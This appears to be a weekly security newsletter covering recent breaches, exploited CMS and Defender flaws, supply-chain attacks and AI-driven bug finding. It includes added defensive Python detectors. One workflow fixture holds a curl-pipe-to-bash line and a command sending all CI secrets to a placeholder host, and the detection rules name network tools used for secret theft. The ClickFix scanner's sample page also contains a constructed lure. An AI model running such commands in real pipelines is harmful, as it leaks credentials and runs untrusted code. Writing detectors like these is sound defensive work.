⏱️ Read Time: 7 minutes

Today’s Rapid Brief is doing that charming thing where every layer of the stack wants attention at once. Drupal is in active-exploitation territory, Ghost CMS is getting dragged into ClickFix campaigns, Microsoft Defender needed zero-day fixes, developer ecosystems are still leaking secrets like a bad faucet, and AI vulnerability discovery is accelerating faster than most patch calendars were emotionally prepared for.

One ask before you dive in: if this recap earns a forward or sparks a debate on your team, share it. If there’s something you think we should cover (or skip) next time, hit reply and tell us. Thanks for reading!

The Bugtraq mailing list launched in 1993 and became one of the earliest public places where security researchers, vendors, and sysadmins argued over vulnerability disclosure before coordinated disclosure had a fancy name.

📜 Table of Contents

  • 💥 Major Breaches & Incidents - 7-Eleven breach update, Lithuania national register leak, bulletproof hosting arrests, First VPN disruption

  • 🛠️ Emerging Threats & Vulnerabilities - Drupal active exploitation, KnowledgeDeliver LMS web shells, Ghost CMS ClickFix campaign, Microsoft Defender zero-days, Laravel-Lang package poisoning, Megalodon GitHub supply-chain attack

  • 🕵️ Privacy Watch - Radiology Associates of Richmond breach

  • 🤖 AI in Cyber - CERT-In 12-hour patch guidance, Anthropic Mythos vulnerability findings

💥 Major Breaches & Incidents

  • 🛒 7-Eleven Breach Exposes Personal Information of More Than 183,000 People
    The 7-Eleven breach story now has a sharper impact number: data for more than 183,000 people was added to Have I Been Pwned. ShinyHunters had previously claimed it stole more than 600,000 Salesforce records, while the company confirmed unauthorized access to systems storing franchisee documents. The update turns a vague extortion claim into a clearer data-exposure issue for impacted individuals.
    👉️ Key takeaway: SaaS breach claims need fast validation, user notification, and credential monitoring because the public leak clock rarely waits for legal review.

  • 🗂️ Lithuania Investigates Leak of 600,000-Plus National Register Entries
    Lithuanian authorities are investigating a major leak involving more than 600,000 national register entries, including real estate and legal entity records. Prosecutors suspect foreign involvement, and the head of the State Enterprise Centre of Registers resigned after the incident. National register data may sound bureaucratic, but attackers love boring official records because they are useful, structured, and hard to change.
    👉️ Key takeaway: Government registries need strong access controls, monitoring, and breach response plans because “public-sector database” is not the same as “low-value target.”

  • 🏴‍☠️ Dutch Authorities Arrest Admins of Bulletproof Hosting Used by Russian Hackers
    Dutch authorities arrested two people tied to companies allegedly providing bulletproof hosting to Russia-aligned threat actors. SecurityWeek reports the infrastructure was allegedly used by groups such as NoName057(16) for DDoS and other attacks against European targets. This is the kind of law-enforcement action that does not just clean up one victim environment. It hits the plumbing attackers rent when they want abuse complaints to go directly into the trash.
    👉️ Key takeaway: Disrupting criminal infrastructure matters because takedowns can raise attacker costs, interrupt campaigns, and expose the service providers behind the curtain.

  • 🕳️ First VPN Cybercrime Service Disrupted and Administrator Arrested
    Authorities disrupted First VPN, a cybercrime service the FBI says was used by dozens of ransomware groups for reconnaissance and intrusions. The administrator was arrested, and the action targeted infrastructure used to anonymize and support malicious activity. Victim-side cleanup is necessary, but ecosystem takedowns hit the services attackers rely on to scale operations quietly.
    👉️ Key takeaway: Watch for follow-on attacker migration after infrastructure takedowns, because disruption helps, but cybercrime crews tend to look for a new hiding place fast.

🛠️ Emerging Threats & Vulnerabilities

  • 🧱 CISA Orders Agencies to Patch Actively Exploited Drupal Flaw
    CISA added CVE-2026-9082 to its Known Exploited Vulnerabilities catalog after Drupal warned the flaw was being exploited in attacks. The vulnerability can be abused without authentication and may lead to information disclosure, privilege escalation, or remote code execution, which is basically the CMS vulnerability tasting menu nobody ordered. Federal agencies have a short patch deadline, but any organization running public-facing Drupal should not wait for attackers to send a calendar invite.
    👉️ Key takeaway: Patch Drupal immediately, confirm exposure across public sites, and check for post-exploitation activity before calling the update done.

  • 🎓 KnowledgeDeliver LMS Zero-Day Used to Drop Web Shells
    Attackers exploited a KnowledgeDeliver LMS zero-day tied to hardcoded machineKey values, enabling ViewState deserialization and remote code execution. SecurityWeek reports the flaw was used to deploy web shells, giving attackers a persistent foothold inside affected systems. Education and training platforms often sit in trusted environments, which makes “just an LMS” a very optimistic phrase.
    👉️ Key takeaway: Patch or isolate KnowledgeDeliver systems, hunt for web shells, and review machineKey exposure before attackers turn training portals into beachheads.

  • 👻 Ghost CMS Flaw Fuels Large-Scale ClickFix Campaign
    Attackers are exploiting CVE-2026-26980 in Ghost CMS to inject malicious JavaScript into vulnerable sites. The injected code pushes visitors into ClickFix-style attack flows, where users are tricked into running commands or completing fake verification steps that install malware. SecurityWeek separately reported hundreds of hacked websites, which means this is not a boutique problem. It is a public-web trust problem with a social-engineering wrapper.
    👉️ Key takeaway: Patch Ghost CMS, scan sites for injected JavaScript, and treat sudden “verification” prompts as a sign your website may be helping attackers do tech support theater.

  • 🛡️ Microsoft Patches Defender Zero-Days Exploited in Attacks
    Microsoft began rolling out fixes for two Defender vulnerabilities exploited as zero-days. Because Defender is built into enterprise Windows defense workflows, flaws in the malware protection engine carry extra weight: the security tool is everywhere, trusted, and usually allowed to touch sensitive parts of the system. Microsoft’s automatic update path helps, but teams should still verify engine versions instead of assuming “it probably handled itself.”
    👉️ Key takeaway: Confirm Defender updates deployed successfully, monitor for exploitation indicators, and remember that security tooling still needs security maintenance.

  • 🧪 Laravel-Lang Packages Poisoned Across Hundreds of Historical Versions
    Attackers rewrote Git tags across four Laravel-Lang packages, poisoning more than 700 historical versions with backdoors. That matters because developers often trust version history, tags, and package metadata as if attackers politely avoid the archives. Applications that installed or updated the compromised localization packages may have pulled malicious code through a supply-chain path that looked routine.
    👉️ Key takeaway: Audit Laravel-Lang dependencies, verify package integrity, rotate exposed secrets, and do not assume older tagged versions are automatically safe.

  • 🦈 Megalodon Supply-Chain Attack Hits 5,500-Plus GitHub Repositories
    Researchers say the Megalodon campaign injected GitHub Actions workflows into more than 5,500 repositories. The workflows were designed to steal credentials, CI secrets, keys, and tokens, turning automation into the attacker’s favorite vending machine. This is separate from last week’s Shai-Hulud drama, which is bad news for anyone hoping developer supply-chain attacks were taking a long weekend.
    👉️ Key takeaway: Review GitHub Actions changes, rotate CI secrets, restrict workflow permissions, and alert on unexpected workflow creation across repositories.
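
For the KnowledgeDeliver item: the concrete check on any ASP.NET application you host is whether web.config carries a static machineKey, whether the same literal keys are reused across deployments, and whether validation still uses a legacy MAC algorithm. The script below is an added example written for this edition, not code from the Rapid Brief or from the KnowledgeDeliver vendor; the config contents, paths, and key strings are constructed placeholders.

```python
import xml.etree.ElementTree as ET
from collections import defaultdict

# Constructed sample web.config files standing in for several deployed ASP.NET apps.
# Every key value below is a made-up placeholder, not a real key from any product.
STATIC_VKEY = "AAAA1111" * 8
STATIC_DKEY = "BBBB2222" * 6


def _config(validation_key, decryption_key, validation="HMACSHA256"):
    """Build a minimal web.config string with the given <machineKey> attributes."""
    return (
        "<configuration><system.web>"
        f'<machineKey validationKey="{validation_key}" decryptionKey="{decryption_key}"'
        f' validation="{validation}" decryption="AES"/>'
        "</system.web></configuration>"
    )


SAMPLE_CONFIGS = {
    # Same literal keys reused in two deployments: a shared, hardcoded secret
    "lms-prod/web.config": _config(STATIC_VKEY, STATIC_DKEY),
    "lms-staging/web.config": _config(STATIC_VKEY, STATIC_DKEY),
    # Static but unique, and using a legacy MAC algorithm
    "portal/web.config": _config("CCCC3333" * 8, "DDDD4444" * 6, validation="SHA1"),
    # Per-machine auto-generated keys: the safe default
    "intranet/web.config": _config("AutoGenerate,IsolateApps", "AutoGenerate,IsolateApps"),
    # No <machineKey> element at all: inherits the auto-generate default
    "legacy/web.config": '<configuration><system.web><compilation debug="false"/></system.web></configuration>',
}


def extract_machine_key(xml_text):
    """Return (validationKey, decryptionKey, validation) from a web.config string,
    or None when the file has no <machineKey> element."""
    node = ET.fromstring(xml_text).find(".//machineKey")
    if node is None:
        return None
    return (node.get("validationKey", ""), node.get("decryptionKey", ""), node.get("validation", ""))


def audit_machine_keys(configs):
    """Classify each config; returns
      static   - paths whose keys are literal values (candidates for rotation)
      shared   - {(validationKey, decryptionKey): [paths]} for literals seen more than once
      weak_mac - paths whose static keys use MD5 or SHA1 validation
    """
    static, weak_mac = [], []
    by_key = defaultdict(list)
    for path, text in configs.items():
        mk = extract_machine_key(text)
        if mk is None:
            continue
        validation_key, decryption_key, validation = mk
        if validation_key.startswith("AutoGenerate") and decryption_key.startswith("AutoGenerate"):
            continue
        static.append(path)
        by_key[(validation_key, decryption_key)].append(path)
        if validation.upper() in ("MD5", "SHA1"):
            weak_mac.append(path)
    shared = {key: paths for key, paths in by_key.items() if len(paths) > 1}
    return {"static": static, "shared": shared, "weak_mac": weak_mac}


if __name__ == "__main__":
    report = audit_machine_keys(SAMPLE_CONFIGS)
    for path in report["static"]:
        print(f"[static machineKey] {path}")
    for paths in report["shared"].values():
        print(f"[same keys in {len(paths)} configs] " + ", ".join(paths))
    for path in report["weak_mac"]:
        print(f"[legacy validation algorithm] {path}")
```

Run it over every web.config you can collect from the fleet. One caveat: an absent element in web.config only means the key is inherited, so include the server-level machine.config and applicationHost.config in the scan before concluding a host is on auto-generated keys. A static key that shows up in more than one deployment, or that a vendor shipped in a product default, is the one to rotate first.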
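
For the Ghost CMS item: "scan sites for injected JavaScript" in practice means pulling each page, separating inline scripts from external ones, and looking for the ClickFix combination of a clipboard write plus a "verify you are human" or "press Win+R" lure, alongside any script host you did not put there. The scanner below is an added example for this edition, not code from the Rapid Brief or from the Ghost project; the sample page, hostnames, and the first-party allowlist are constructed, and the base64 string decodes to the word PLACEHOLDER.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this site legitimately loads scripts from (assumed for the sample below).
FIRST_PARTY_HOSTS = {"blog.example.org"}

# Constructed sample page: a normal theme script, one unexpected third-party loader,
# and an injected inline block shaped like a ClickFix lure. Hostnames are placeholders.
SAMPLE_HTML = """<html><head>
<script src="https://blog.example.org/assets/theme.js"></script>
<script src="https://cdn.example-third-party.test/loader.js"></script>
</head><body>
<h1>Welcome</h1>
<script>
  document.body.insertAdjacentHTML('beforeend',
    '<div>Verify you are human: press Win+R and paste</div>');
  navigator.clipboard.writeText(atob('UExBQ0VIT0xERVI='));
</script>
<script>console.log('analytics ok');</script>
</body></html>"""

# Each indicator alone is common on legitimate pages; the combination is what matters.
INDICATORS = {
    "clipboard_write": re.compile(r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy['\"]"),
    "run_dialog_lure": re.compile(r"win\s*\+\s*r\b|windows\s+key", re.I),
    "human_check_lure": re.compile(r"verify (that )?you are (a )?human|not a robot", re.I),
    "obfuscated_payload": re.compile(r"\batob\(|String\.fromCharCode|unescape\("),
}


class ScriptCollector(HTMLParser):
    """Collect inline script bodies and external script URLs from a page."""

    def __init__(self):
        super().__init__()
        self.inline, self.external = [], []
        self._in_script, self._buf = False, []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script, self._buf = True, []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)   # script bodies arrive as raw CDATA text

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def scan_page(html, first_party_hosts):
    """Return indicator hits per inline script, the indices that look like ClickFix
    (clipboard write combined with a lure phrase), and off-host external scripts."""
    collector = ScriptCollector()
    collector.feed(html)
    hits = {}
    for idx, code in enumerate(collector.inline):
        names = [name for name, rx in INDICATORS.items() if rx.search(code)]
        if names:
            hits[idx] = names
    suspicious = sorted(
        idx for idx, names in hits.items()
        if "clipboard_write" in names and {"run_dialog_lure", "human_check_lure"} & set(names)
    )
    off_host = []
    for src in collector.external:
        host = urlparse(src).hostname
        if host and host not in first_party_hosts:   # relative URLs count as first-party
            off_host.append(src)
    return {"indicators": hits, "suspicious_inline": suspicious, "external_off_host": off_host}


if __name__ == "__main__":
    result = scan_page(SAMPLE_HTML, FIRST_PARTY_HOSTS)
    for idx in result["suspicious_inline"]:
        print(f"[clickfix-like inline script #{idx}] {result['indicators'][idx]}")
    for src in result["external_off_host"]:
        print(f"[external script off allowlist] {src}")
```

Point it at the rendered HTML of each page (the output of an HTTP fetch or a crawler, not the theme source on disk), because injected code typically lives in the database-backed content or a tampered theme file and only shows up in what visitors receive. Pair the scan with a diff against a known-clean export of the same pages so that a theme's own clipboard helper does not keep paging someone.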
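
For the Laravel-Lang item: a rewritten tag is invisible to anyone who only reads version numbers, but composer.lock records the exact commit each package was installed from, and `git ls-remote --tags` reports what the tag points to now. Comparing the two is the "verify package integrity" step in practice. The script below is an added example for this edition, not code from the Rapid Brief, Composer, or the Laravel-Lang project; the lock excerpt, remote output, and every hash are constructed placeholders, and it assumes a tag is named either exactly like the version or with a leading "v".

```python
import json


def _sha(ch):
    """40-character placeholder hash built from one repeated character."""
    return ch * 40


# Constructed composer.lock excerpt. Package names follow the Laravel-Lang style;
# URLs use the reserved .invalid domain and every reference is a placeholder.
SAMPLE_LOCK = json.dumps({"packages": [
    {"name": "laravel-lang/common", "version": "6.4.0",
     "source": {"type": "git", "url": "https://example.invalid/laravel-lang/common.git",
                "reference": _sha("1")}},
    {"name": "laravel-lang/attributes", "version": "2.10.1",
     "source": {"type": "git", "url": "https://example.invalid/laravel-lang/attributes.git",
                "reference": _sha("2")}},
    {"name": "laravel-lang/locales", "version": "2.9.0",
     "source": {"type": "git", "url": "https://example.invalid/laravel-lang/locales.git",
                "reference": _sha("3")}},
]})

# Constructed `git ls-remote --tags` output for the first package. Annotated tags
# show up twice; the '^{}' line carries the commit the tag actually points to.
SAMPLE_LS_REMOTE = (
    f"{_sha('1')}\trefs/tags/6.4.0\n"
    f"{'ab' * 20}\trefs/tags/v6.3.0\n"
    f"{'12' * 20}\trefs/tags/v6.3.0^{{}}\n"
)


def parse_ls_remote(output):
    """Map tag name -> commit hash from `git ls-remote --tags` output."""
    tags = {}
    for line in output.splitlines():
        if not line.strip():
            continue
        sha, ref = line.split(maxsplit=1)
        if not ref.startswith("refs/tags/"):
            continue
        name = ref[len("refs/tags/"):]
        if name.endswith("^{}"):
            tags[name[:-3]] = sha          # peeled entry wins for annotated tags
        else:
            tags.setdefault(name, sha)
    return tags


# Current tag targets per package (constructed): one unchanged, one re-pointed, one gone.
CURRENT_TAGS = {
    "laravel-lang/common": parse_ls_remote(SAMPLE_LS_REMOTE),
    "laravel-lang/attributes": {"2.10.1": _sha("f")},
    "laravel-lang/locales": {},
}


def detect_tag_drift(lock_json, current_tags):
    """Compare the commit each package was installed from (composer.lock
    source.reference) with where its version tag points now."""
    findings = []
    for pkg in json.loads(lock_json)["packages"]:
        source = pkg.get("source") or {}
        if source.get("type") != "git":
            continue            # dist-only entries carry no commit to compare
        locked = source["reference"]
        tags = current_tags.get(pkg["name"], {})
        version = pkg["version"]
        current = tags.get(version) or tags.get("v" + version)
        if current is None:
            status = "missing"
        elif current != locked:
            status = "moved"
        else:
            continue
        findings.append({"name": pkg["name"], "version": version,
                         "locked": locked, "current": current, "status": status})
    return findings


if __name__ == "__main__":
    for f in detect_tag_drift(SAMPLE_LOCK, CURRENT_TAGS):
        print(f"[{f['status']}] {f['name']} {f['version']}: locked {f['locked'][:8]}, now {f['current']}")
```

A "moved" result only proves the tag changed after your lock file was written. If the lock file itself was regenerated after the rewrite, it already records the poisoned commit, so compare against a lock file from a known-good point in history (or the maintainers' published list of affected tags) rather than only against the remote as it stands today.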
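
For the Megalodon item: "alert on unexpected workflow creation" and "review GitHub Actions changes" boil down to one check on every commit, namely whether it adds or edits anything under .github/workflows and, if so, whether the workflow dumps secrets, ships them to the network, pipes a remote script into a shell, asks for write-all permissions, or checks out untrusted pull-request code under pull_request_target. The reviewer below is an added example for this edition, not code from the Rapid Brief, GitHub, or the Megalodon researchers. It scans workflow text with regular expressions rather than parsing YAML (an assumption that keeps it dependency-free); the change set and hostnames are constructed.

```python
import re

WORKFLOW_DIR = ".github/workflows/"

# Constructed change set for one commit: (path, status, file content). The second
# workflow is shaped like the credential-stealing pattern a detector should flag;
# every hostname uses the reserved .invalid domain.
SAMPLE_CHANGES = [
    (".github/workflows/ci.yml", "modified",
     "name: CI\non: [push]\njobs:\n  test:\n    runs-on: ubuntu-latest\n"
     "    steps:\n      - uses: actions/checkout@v4\n      - run: npm test\n"),
    (".github/workflows/sync.yml", "added",
     "name: sync\non: [push, pull_request_target]\npermissions: write-all\n"
     "jobs:\n  run:\n    runs-on: ubuntu-latest\n    steps:\n"
     "      - uses: actions/checkout@v4\n        with:\n"
     "          ref: ${{ github.event.pull_request.head.sha }}\n"
     "      - run: |\n"
     "          curl -sSL https://example.invalid/s.sh | bash\n"
     "          echo '${{ toJSON(secrets) }}' | curl -d @- https://example.invalid/c\n"),
    ("README.md", "modified", "# project\n"),
]

# Line-oriented rules; '.' does not cross newlines, so each hit is within one line.
RULES = {
    # Serialises the whole secrets context into the job
    "secrets_dump": re.compile(r"toJSON\(\s*secrets\s*\)"),
    # A secrets expression and a network client on the same line
    "secret_to_network": re.compile(
        r"\$\{\{[^}]*secrets[^}]*\}\}.*\b(curl|wget|nc)\b|\b(curl|wget|nc)\b.*\$\{\{[^}]*secrets[^}]*\}\}"),
    # Remote content executed unseen
    "remote_script_pipe": re.compile(r"\b(curl|wget)\b[^\n|]*\|\s*(ba)?sh\b"),
    # Token scope far wider than a build needs
    "write_all_permissions": re.compile(r"permissions:\s*write-all"),
}


def audit_workflow(content):
    """Return the names of every rule a workflow file trips."""
    hits = [name for name, rx in RULES.items() if rx.search(content)]
    # pull_request_target runs with the base repository's secrets; checking out the
    # PR head there lets untrusted code run with them
    if "pull_request_target" in content and "github.event.pull_request.head" in content:
        hits.append("pr_target_head_checkout")
    return hits


def audit_changes(changes):
    """Review a commit's changed files; only workflow files are examined."""
    findings = []
    for path, status, content in changes:
        if not path.startswith(WORKFLOW_DIR):
            continue
        hits = audit_workflow(content)
        if status == "added":
            hits.insert(0, "new_workflow")   # new automation always deserves a human look
        if hits:
            findings.append({"path": path, "status": status, "rules": hits})
    return findings


if __name__ == "__main__":
    for finding in audit_changes(SAMPLE_CHANGES):
        print(f"{finding['path']} ({finding['status']}): {', '.join(finding['rules'])}")
```

Feed it the file list and contents of each push (a pre-receive hook, a scheduled pass over the organization's recent commits, or the webhook payload for push events) and route "new_workflow" findings to a person regardless of the other rules, because a clean-looking new workflow is exactly how a foothold starts. Rotating the CI secrets any flagged workflow could have read is the follow-up step, since the detection arrives after the run, not before it.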

🕵️ Privacy Watch

  • 🏥 Radiology Associates of Richmond Breach Affects 266,000 People
    Radiology Associates of Richmond disclosed that attackers stole files containing names and protected health information from its systems. The breach affects roughly 266,000 people, making it a solid reminder that healthcare data remains one of the most reliable targets on the internet. Medical records are valuable because they combine identity, billing, treatment, and insurance context in one tidy package criminals do not have to assemble themselves.
    👉️ Key takeaway: Healthcare organizations need stronger segmentation, faster breach detection, and tighter third-party controls because protected health information keeps showing up in the blast radius.

🤖 AI in Cyber

  • ⏱️ CERT-In Calls for 12-Hour Patching of Critical Internet-Facing Flaws
    India’s CERT-In issued guidance calling for critical internet-facing vulnerabilities to be patched within 12 hours where feasible. The agency cited AI-assisted vulnerability discovery and exploitation speed as part of the urgency, which is a polite way of saying attackers are not waiting for your next change advisory board meeting. This is a major signal that patch governance is being pulled toward much shorter response windows.
    👉️ Key takeaway: Organizations need real-time asset inventory, emergency patch workflows, and rollback plans before 12-hour patching becomes the new executive expectation.

  • 🧠 Anthropic Mythos Finds 23,000 Potential Vulnerabilities Across Open Source Projects
    Anthropic says its Mythos Preview system identified more than 23,000 potential vulnerabilities across more than 1,000 open-source projects. So far, 1,726 have reportedly been confirmed, with more than 1,000 rated high or critical. The headline number is flashy, but the real operational problem is triage: finding bugs at scale is useful only if maintainers and defenders can validate, prioritize, and fix them before the backlog becomes a landfill.
    👉️ Key takeaway: AI-driven vulnerability discovery is becoming real, but remediation capacity, maintainer bandwidth, and disclosure workflows are now the bottleneck.

Thanks for reading this week’s edition. Like what you see? Forward it!

Hate everything you see or have other feedback? Reply back to this email!